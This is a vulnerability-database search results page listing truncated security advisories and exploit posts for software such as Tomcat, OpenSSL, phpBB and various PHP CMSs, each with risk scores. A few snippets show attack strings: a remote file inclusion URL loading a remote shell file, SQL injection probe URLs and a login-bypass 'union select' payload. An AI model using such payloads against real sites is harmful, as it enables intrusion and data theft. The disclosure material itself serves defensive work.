Lucene search
K
SecurityvulnsMost viewed

47153 matches found

securityvulns
securityvulns
added 2007/06/14 12:0 a.m.183 views

[Full-disclosure] [CVE-2007-2450]: Apache Tomcat XSS vulnerability in Manager

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2007-2450: Apache Tomcat XSS vulnerabilities in Manager Severity: low cross-site scripting Vendor: The Apache Software Foundation Versions Affected: Tomcat 4.0.0 to 4.0.6 Tomcat 4.1.0 to 4.1.36 Tomcat 5.0.0 to 5.0.30 Tomcat 5.5.0 to 5.5.24 Tomcat...

3.5CVSS7.5AI score0.03291EPSS
Exploits0
securityvulns
securityvulns
added 2003/08/04 12:0 a.m.183 views

Win32 Device Drivers Communication Vulnerabilities

Win32 Device Drivers Communication Vulnerabilities Proof Of Concept - Exploiting Norton AntiVirus Device Driver Written by Lord YuP / sEC-Labs ^ tkT Tested on NAV 2002! zipped exploit http://sec-labs.hack.pl DISCLAIMER: This paper is written in educational purposes only. Author, sEC-Labs, tkT tea...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2015/05/11 12:0 a.m.182 views

Remote file upload vulnerability in videowhisper-video-conference-integration wordpress plugin v4.91.8

Title: Remote file upload vulnerability in videowhisper-video-conference-integration wordpress plugin v4.91.8 Author: Larry W. Cashdollar, @larry0 Date: 2015-03-29 Download Site: https://wordpress.org/support/plugin/videowhisper-video-conference-integration Vendor: http://www.videowhisper.com/...

0.4AI score
Exploits0
securityvulns
securityvulns
added 2014/10/15 12:0 a.m.182 views

HttpFileServer code execution

Code execution via GET request...

7.5CVSS1.9AI score0.99323EPSS
Exploits23References1Affected Software1
securityvulns
securityvulns
added 2014/04/08 12:0 a.m.182 views

[USN-2165-1] OpenSSL vulnerabilities

========================================================================== Ubuntu Security Notice USN-2165-1 April 07, 2014 openssl vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...

5CVSS0.6AI score0.99999EPSS
Exploits88
securityvulns
securityvulns
added 2013/07/29 12:0 a.m.182 views

[security bulletin] HPSBMU02894 rev.1 - HP Network Node Manager I (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Denial of Service (DoS), Unauthorized Access, Execution of Arbitrary Code

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c03824583 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03824583 Version: 1 HPSBMU02894 rev....

7.5CVSS1.3AI score0.80318EPSS
Exploits43
securityvulns
securityvulns
added 2012/08/13 12:0 a.m.182 views

Multiple vulnerabilities in PBBoard

Advisory ID: HTB23101 Product: PBBoard Vendor: www.pbboard.com Vulnerable Versions: 2.1.4 and probably prior Tested Version: 2.1.4 Vendor Notification: July 18, 2012 Public Disclosure: August 8, 2012 Vulnerability Type: SQL Injection CWE-89, Improper Authentication CWE-287, Improper Access Contro...

7.5CVSS0.5AI score0.03076EPSS
Exploits10
securityvulns
securityvulns
added 2011/09/20 12:0 a.m.182 views

[DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability (by ERPScan)

DSECRG-11-033 SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability XSS vulnerability found in pubDBLogon.jsp page of SAP Crystal Report Server 2008. Application: SAP Crystal Report Server 2008 Versions Affected: SAP Crystal Report Server 2008 Vendor URL: http://www.sap.com Bugs: Linked...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2011/05/04 12:0 a.m.182 views

Cisco IOS UDP Denial of Service Vulnerability

Cisco IOS UDP Denial of Service Vulnerability ------------------------------------------------------------------ I. Summary Cisco routers running IOS 15.0 allows a remote attacker to cause a denial of service via a flood of UDP packets a randomly chosen UDP port...

2.7AI score
Exploits0
securityvulns
securityvulns
added 2008/10/29 12:0 a.m.182 views

Writeup by Amit Klein (Trusteer): Address Bar Spoofing for IE6

Address Bar Spoofing Attacks against Microsoft Internet Explorer 6 Amit Klein, Trusteer Summary ======= IE6 is the second most popular web browser after IE7, with market share of around 25 according to recent surveys e.g. http://marketshare.hitslink.com/report.aspx?qprid=2. This write-up presents...

6.6AI score
Exploits0
securityvulns
securityvulns
added 2007/05/08 12:0 a.m.182 views

pfa CMS v6.0 (index.php repinc) Remote File Include Vulnerability

pfa CMS v6.0 // AYYILDIZ.ORG Gururla Sunar ! = OZELHAREKAT Author: iLker Kandemir [email protected] ScriptSite: http://pfa.netsliver.com/downloadpfa Tnx: H0tturk,Ekin0x,Dumenci,Gencnesil,Gencturk,Str0ke Exploit: http://site/pfapath/index.php?repinc=http://shell.txt?...

0.7AI score
Exploits0
securityvulns
securityvulns
added 2006/11/18 12:0 a.m.182 views

20/20 auto gallery [ multiples injection sql ]

vendor site:http://www.2020autogallery.com/ product:20/20 auto gallery bug:injection sql global risk:high injection sql get : http://site.com/vehiclelistings.asp?vehicleID='sql http://site.com/vehiclelistings.asp?categoryIDlist='sql http://site.com/vehiclelistings.asp?saletype='sql...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2003/12/29 12:0 a.m.182 views

[Full-Disclosure] php-ping: Executing arbritary commands

ppp-design found the following design error in php-ping: Details ------- Product: php-ping Affected Version: no version information included in the script Immune Version: latest version OS affected: all OS with php Vendor-URL: http://www.theworldsend.net/ Vendor-Status: informed, new version...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2001/03/16 12:0 a.m.182 views

vBulletin allows arbitrary code execution

OVERVIEW ======== vBulletin http://www.vbulletin.com is a commonly used web forum system written in PHP. One of its key features is use of templates, which allow the board administrator to dynamically modify the look of the board. vBulletin templates are parsed with the eval function. This could ...

0.5AI score
Exploits0
securityvulns
securityvulns
added 2013/07/15 12:0 a.m.181 views

ESA-2013-045: RSA BSAFE® SSL-C Security Update for SSL/TLS Plaintext Recovery (aka “Lucky Thirteen”) Vulnerability

ESA-2013-045.txt -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2013-045: RSA BSAFE® SSL-C Security Update for SSL/TLS Plaintext Recovery aka “Lucky Thirteen” Vulnerability EMC Identifier: ESA-2013-045 CVE Identifier: CVE-2013-0169 Severity Rating: CVSS v2 Base Score: 2.6...

2.6CVSS7.1AI score0.35584EPSS
Exploits1
securityvulns
securityvulns
added 2011/04/26 12:0 a.m.181 views

[security bulletin] HPSBMA02658 SSRT100413 rev.1 - Insight Control for Linux (IC-Linux), Remote Unauthorized Elevation of Privilege, Execution of Arbitrary Code, Encryption Downgrade, Information Disclosure, Denial of Service (DoS)

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02794777 Version: 1 HPSBMA02658 SSRT100413 rev.1 - Insight Control for Linux IC-Linux, Remote Unauthorized Elevation of Privilege, Execution of Arbitrary Code, Encryption Downgrade, Information...

7.6CVSS0.7AI score0.22145EPSS
Exploits0
securityvulns
securityvulns
added 2010/08/12 12:0 a.m.181 views

PR10-07: Unauthenticated File Retrieval (traversal) within ColdFusion administration console

PR10-07: Unauthenticated File Retrieval traversal within ColdFusion administration console Vulnerability found: 17th April 2010 Vendor informed: 19th April 2010 Vulnerability fixed: 10th August 2010 Severity: High Description: Adobe ColdFusion is a easy to use and very widely adopted Programming...

7.5CVSS9.4AI score0.99721EPSS
Exploits13
securityvulns
securityvulns
added 2009/09/28 12:0 a.m.181 views

XSS and Content Spoofing vulnerabilities in CKEditor

Hello 3APA3A! I want to warn you about Cross-Site Scripting and Content Spoofing vulnerabilities in CKEditor. XSS: This is Persistent XSS vulnerability. Attack is conducting via placing link with setting the style. a href="http://test"...

Exploits0
securityvulns
securityvulns
added 2009/05/26 12:0 a.m.181 views

Multiple vulnerabilities in several ATEN IP KVM Switches

Jakob Lell from the TU Berlin computer security working group http://www.agrs.tu-berlin.de/v-menue/agrechnersicherheit/parameter/en/ has discovered multiple vulnerabilities in several ATEN IP KVM Switches. Affected products: - ATEN KH1516i IP KVM Switch browser firmware version 1.0.063 - ATEN...

10CVSS0.5AI score0.03191EPSS
Exploits0
securityvulns
securityvulns
added 2007/12/29 12:0 a.m.181 views

[Full-disclosure] Persits Software XUpload Control Buffer Overflow Exploit

I tried posting this yesterday, don't know what happened, anyhow, my advance apologies for any double posts. I took a shot at writing an exploit for this, so here goes. Code is inline and attached. ------------------------- !-- written by e.b. Persits Software XUpload Control AddFolder Buffer...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2012/12/18 12:0 a.m.180 views

FCKEditor File Upload Vulnerability

Description: There is no validation on the extensions when FCKEditor 2.6.8 ASP version is dealing with the duplicate files. As a result, it is possible to bypass the protection and upload a file with any extension. - Reference: http://www.exploit-db.com/exploits/23005/ vulnerable versions: prior...

1.4AI score
Exploits0
securityvulns
securityvulns
added 2009/04/17 12:0 a.m.180 views

Phorum < 5.2.10 Cross-Site Scripting/Request Forgery

=cicatriz [email protected]==advisories= / / / / // / / // / o / / .-/ =Phorum 5.2.10 Cross-Site Scripting/Request Forgery==/= == =Advisory & Vulnerability Information=== Title: Phorum 5.2.10 Cross-Site Scripting/Request Forgery Advisory ID: VUDO-2009-1504 Advisory URL:...

6.2AI score
Exploits0
securityvulns
securityvulns
added 2007/10/23 12:0 a.m.180 views

Simple PHP Blog (sphpblog) <= 0.5.1 Multiple Vulnerabilities

Title: Simple PHP Blog sphpblog = 0.5.1 Multiple Vulnerabilities Vendor: http://sourceforge.net/projects/sphpblog/ Advisory: http://acid-root.new.fr/?0:15 Author: DarkFig gmdarkfig at gmail dot com Released on: 2007/10/21 Changelog: ---------- L M H T Summary: Ip Spoofing X X Cross Site Scripting...

Exploits0
securityvulns
securityvulns
added 2007/04/11 12:0 a.m.180 views

Battle.net Clan Script for PHP 1.5.1 Remote SQL Injection Vulnerability

script : Battle.net Clan Script 1.5 file : login.php attack : injection sql auteur : h a c k e r X code : ------------------------------------------------------------------------------------------ line 9 -- $user = $POST'user'; line 10-- $pass = $POST'pass'; ..... ..... ..... line 21--...

1.9AI score
Exploits0
securityvulns
securityvulns
added 2006/09/12 12:0 a.m.180 views

OPENi-CMS 1.0.1(config) Remote File Inclusion Vulnerability

Update: 22:44 09/11/06 Subject: "OPENi-CMS 1.0.1config Remote File Inclusion Vulnerability " Vulnerable version: OPENi-CMS 1.0.1 Operating System: - All OS Vendor URL: Support - [email protected] Website - http://www.openi-cms.org/ Description: Openi-CMS he one software PHP Content Management...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2002/08/20 12:0 a.m.180 views

Apache 2.0.39 directory traversal and path disclosure bug

Auriemma Luigi, PivX security advisory AL001 Application: Apache WebServer http://httpd.apache.org Version: 2.0.39 and previous 2.0.x, ONLY on systems that supports backslash path delimiters Win/Netware/OS2 etc... Bug: Directory traversal vulnerability and path disclosure Risk high: An attacker c...

7.5CVSS6.5AI score0.69698EPSS
Exploits0
securityvulns
securityvulns
added 2015/10/12 12:0 a.m.179 views

[USN-2744-1] Apport vulnerability

========================================================================== Ubuntu Security Notice USN-2744-1 September 24, 2015 apport vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...

7.2CVSS0.0091EPSS
Exploits2
securityvulns
securityvulns
added 2015/05/12 12:0 a.m.179 views

Wolf CMS 0.8.2 Arbitrary File Upload Vulnerability

,--^----------,--------,-----,-------^--, | ||||||||| --------' | O .. CWH Underground Hacking Team .. +---------------------------^----------| ,-------, | / XXXXXX /| / / XXXXXX / / / XXXXXX / / XXXXXX / / XXXXXX / ------' Exploit Title : Wolf CMS Arbitrary File Upload Exploit Date : 16 April 20...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2015/02/02 12:0 a.m.179 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

7.5CVSS1.6AI score0.02789EPSS
Exploits28References13Affected Software7
securityvulns
securityvulns
added 2013/07/19 12:0 a.m.179 views

SEC Consult SA-20130625-0 :: Multiple vulnerabilities in IceWarp Mail Server

SEC Consult Vulnerability Lab Security Advisory 20130625-0 ======================================================================= title: Multiple vulnerabilities in IceWarp Mail Server product: IceWarp Mail Server vulnerable version: =10.4.5 fixed version: 10.4.5-1 impact: Critical homepage:...

6.8AI score
Exploits0
securityvulns
securityvulns
added 2011/09/26 12:0 a.m.179 views

Multiple vulnerabilities in Help Desk Software

Vulnerability ID: HTB23041 Reference: https://www.htbridge.ch/advisory/multiplevulnerabilitiesinhelpdesksoftware.html Product: Help Desk Software Vendor: freehelpdesk.org http://freehelpdesk.org/ Vulnerable Version: 1.1b and probably prior Tested Version: 1.1b Vendor Notification: 17 August 2011...

0.9AI score
Exploits0
securityvulns
securityvulns
added 2011/07/26 12:0 a.m.179 views

phpBB AJAX Chat/Shoutbox MOD CSRF Vulnerability

View here: https://www.stevenroddis.com/phpbb-ajax-chatshoutbox-mod-csrf-vulnerability/ Title: phpBB AJAX Chat/Shoutbox MOD CSRF Vulnerability Release Date: 2011-04-30 Product Affected: http://startrekaccess.com/community/viewtopic.php?f=127&t=8675 Responsible Disclosure: After repeated attempts ...

7.1AI score
Exploits0
securityvulns
securityvulns
added 2011/04/21 12:0 a.m.179 views

Directory Traversal Vulnerability in Viola DVR VIO-4/1000

============================================================== Viola DVR VIO-4/1000 - Directory Traversal Vulnerability ============================================================== Software: Viola DVR VIO-4/1000 other products may be affected Vendor: http://www.videcon.co.uk/ Vuln Type: Directo...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2007/04/12 12:0 a.m.179 views

WebSPELL <= 4.01.02 (picture.php) Remote File Disclosure Vulnerability

WebSPELL = 4.01.02 picture.php Remote File Disclosure Vulnerability Discovered by: Trex Visit: www.Trex-Online.net / www.UnderGround.ag Comment: Happy easter! / / / / / / / // / GIVE ME A CARROT OR I WILL O O/ BLOW UP YOUR HOUSE / / ^ / / / // / // /// Vulnerability 1: Advantage: works...

0.5AI score
Exploits0
securityvulns
securityvulns
added 2007/01/24 12:0 a.m.179 views

[Aria-Security Team] MyBB Cross-Site Scripting

Aria-Security Team http://Aria-Security.com http://www.aria-security.com/forum/showthread.php?p=144 Contact: [email protected] Type:Remote Cross-Site Scripting Article on XSS: http://aria-security.net/xss.rar Discovered By Aria-Security Team Software: MyBB Explanation: First of all user...

0.9AI score
Exploits0
securityvulns
securityvulns
added 2006/12/31 12:0 a.m.179 views

ASPTicker 1.0 (admin.asp) Remote Login ByPass SQL Injection Vulnerability

Title : ASPTicker 1.0 admin.asp Remote Login ByPass SQL Injection Vulnerability Author : ajann Contact : : S.Page : http://www.aspapps.com $$ : $ 17.00 SQL--------------------------------------------------------- http://target/path//admin.aspByPass Example: //Password 'union select 0,0,0 from...

0.9AI score
Exploits0
securityvulns
securityvulns
added 2006/07/24 12:0 a.m.179 views

PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion

SolpotCrew Community PHP Event Calendar versi 1.4 pathtocalendar Remote File Inclusion Vendor site : http://www.softcomplex.com/products/phpeventcalendar/ Bug Found By :Solpot a.k.a k. Hasibuan 13th july 2006 contact: [email protected] Website : http://www.solpotcrew.org/adv/solpot-adv-01.t...

1.5AI score
Exploits0
securityvulns
securityvulns
added 2005/10/12 12:0 a.m.179 views

[EEYEB20050708] Microsoft Distributed Transaction Coordinator Memory Modification Vulnerability

Microsoft Distributed Transaction Coordinator Memory Modification Vulnerability Release Date: October 11, 2005 Date Reported: July 8, 2005 Severity: High Remote Code Execution Vendor: Microsoft Systems Affected: Windows 2000 Server SP0 - SP4 - Vulnerable - Anonymous remotely exploitable by defaul...

5CVSS6.2AI score0.39128EPSS
Exploits0
securityvulns
securityvulns
added 2001/09/25 12:0 a.m.179 views

twlc advisory: all versions of php nuke are vulnerable...

twlc security divison 24/09/2001 Php nuke BUGGED. Found by: LucisFero and supergate ./twlc Summary This time the bug is really dangerous...it allows you to 'cp' any file on the box... or even upload files... Systems Affected all the versions ARE vulnerable except '5.0 RC1' i wonder why a released...

7.1AI score
Exploits0
securityvulns
securityvulns
added 2015/11/01 12:0 a.m.178 views

ntp multiple security vulnerabilities

Multiple memory corruptions...

7.8CVSS1.7AI score0.81762EPSS
Exploits6References1Affected Software1
securityvulns
securityvulns
added 2014/10/15 12:0 a.m.178 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

7.5CVSS1.6AI score0.2226EPSS
Exploits33References30Affected Software19
securityvulns
securityvulns
added 2014/08/04 12:0 a.m.178 views

Barracuda Networks Web Application Firewall v6.1.5 & LoadBalancer v4.2.2 #37 - Filter Bypass & Multiple Vulnerabilities

Document Title: =============== Barracuda Networks Web Application Firewall v6.1.5 & LoadBalancer v4.2.2 37 - Filter Bypass & Multiple Vulnerabilities References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1103 Barracuda Networks Security ID BNSEC: BNSEC-1263...

6.8AI score
Exploits0
securityvulns
securityvulns
added 2013/04/28 12:0 a.m.178 views

BF and IA vulnerabilities in IBM Lotus Domino

Hello 3APA3A! I want to warn you about Brute Force and Insufficient Authentication vulnerabilities in IBM Lotus Domino. These are vulnerabilities in Domino, which I've found at 03.05.2012 together with other holes. Last year I've announced multiple vulnerabilities in IBM software and after IBM...

Exploits0
securityvulns
securityvulns
added 2012/12/10 12:0 a.m.178 views

FortiWeb 4kC,3kC,1kC & VA - Cross Site Vulnerabilities

Title: ====== FortiWeb 4kC,3kC,1kC & VA - Cross Site Vulnerabilities Date: ===== 2012-12-01 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=702 VL-ID: ===== 702 Common Vulnerability Scoring System: ==================================== 2.1 Introduction: =============...

0.5AI score
Exploits0
securityvulns
securityvulns
added 2012/10/29 12:0 a.m.178 views

Mozilla Firefox / Thunderbird / Seamonkey multiple security vulnerabilities

Information leakage, multiple memory corruptions, crossite scripting, etc...

10CVSS1.7AI score0.42609EPSS
Exploits11Affected Software3
securityvulns
securityvulns
added 2008/02/27 12:0 a.m.178 views

[ MDVSA-2008:050 ] - Updated cups packages fix multiple vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2008:050 http://www.mandriva.com/security/ Package : cups Date : February 26, 2008 Affected: Corporate 3.0 Problem Description: Dave Camp at Critical Path Software discovered a buffer overflow in CUPS 1.1.23 and...

10CVSS9.5AI score0.05793EPSS
Exploits2
securityvulns
securityvulns
added 2007/04/09 12:0 a.m.178 views

[Full-disclosure] Some 0day Pocs

Mati Aharoni muts .@. offensive-security.com mailto:[email protected] http://www.offensive-security.com My 7 line python fuzzer found several file format bugs in 3 hours. Quite alarming. No deep analysis was done, I leave that to the community. These are some of the results: file789-1.d...

0.8AI score
Exploits0
securityvulns
securityvulns
added 2007/03/17 12:0 a.m.178 views

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

10CVSS1.5AI score0.36967EPSS
Exploits6References17Affected Software20
securityvulns
securityvulns
added 2006/08/11 12:0 a.m.178 views

Mafia Moblog <= 6 (pathtotemplate) Remote File Inclusion Vulnerability

------------------------------------------------------------------------ ------------------- Mafia Moblog pathtotemplate Remote File Inclusion ------------------------------------------------------------------------ ------------------- Author : Sh3ll Date : 2006/04/30 HomePage : http://www.sh3ll....

1AI score
Exploits0
securityvulns
securityvulns
added 2004/05/31 12:0 a.m.178 views

[waraxe-2004-SA#031 - Multiple vulnerabilities in e107 version 0.615]

================================================================================ waraxe-2004-SA031 ================================================================================ Multiple vulnerabilities in e107 version 0.615...

Exploits0
Total number of security vulnerabilities5000